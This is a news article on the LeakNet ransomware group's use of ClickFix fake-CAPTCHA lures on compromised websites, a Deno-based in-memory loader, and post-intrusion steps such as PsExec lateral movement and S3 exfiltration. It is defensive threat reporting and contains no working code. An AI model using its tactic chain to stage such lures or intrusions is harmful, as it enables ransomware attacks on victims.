The ransomware operation known as LeakNet has adopted the ClickFix social engineering tactic. It delivers attacks through compromised websites as an initial access method. This marks a shift from traditional intrusion techniques.
ClickFix tricks users into running malicious commands manually. Victims believe they are fixing non-existent system errors. This approach replaces older methods like stolen credentials from access brokers.
Another key element of the attack involves a staged command-and-control loader. It uses the Deno JavaScript runtime to execute malicious payloads directly in memory. This reduces the chances of detection.
Security researchers highlight that both attack paths follow a consistent pattern. This repeatable behavior helps defenders identify and stop attacks earlier. It provides clear detection opportunities before ransomware deployment.
LeakNet Adopts ClickFix for Initial Access
LeakNet first appeared in November 2024. The group described itself as a “digital watchdog” focused on internet transparency. However, it has targeted multiple industries, including industrial sectors.
Using ClickFix offers several operational advantages. It reduces reliance on third-party access providers and lowers attack costs. It also removes delays caused by waiting for stolen credentials.
In these attacks, compromised websites display fake CAPTCHA checks. These prompts trick users into running commands like “msiexec.exe” in the Windows Run dialog. This allows attackers to gain access.
The attacks are not limited to specific industries. Instead, they target a wide range of victims. This broad approach increases the chances of successful infections.
Deno-Based Loader Enhances Stealth and Execution
Threat actors increasingly use ClickFix techniques. This method exploits trusted workflows to make malicious actions appear safe. Users often do not suspect anything unusual.
Security experts note this marks a strategic shift for LeakNet. By avoiding access brokers, the group can scale operations faster. Compromised websites also make detection more difficult.
LeakNet uses a Deno-based loader to execute encoded JavaScript in memory. This approach minimizes evidence on disk. It helps attackers evade traditional security tools.
The payload collects system information and connects to external servers. It then downloads additional malware in stages. This continuous process allows attackers to maintain control.
Read : PRISM BioLab, Receptor.AI Partner for Drug Discovery
Post-Exploitation Tactics and Growing Ransomware Threats
In some cases, attackers also use phishing through Microsoft Teams. These attacks trick users into launching similar payload chains. This suggests the technique is spreading among threat groups.
After gaining access, LeakNet follows a structured attack process. It uses DLL side-loading, moves laterally with PsExec, and exfiltrates data. Finally, it encrypts systems for ransom.
The group also runs system commands to identify active credentials. This helps attackers move quickly without requesting new access. It increases the efficiency of the attack.
For data exfiltration, LeakNet uses cloud storage like S3 buckets. This disguises malicious activity as normal traffic. It reduces the chances of detection by security systems.
Recent reports show ransomware activity remains strong. Groups like Qilin, Akira, and Cl0p continue to dominate. However, attackers are shifting toward targeting smaller organizations at scale.
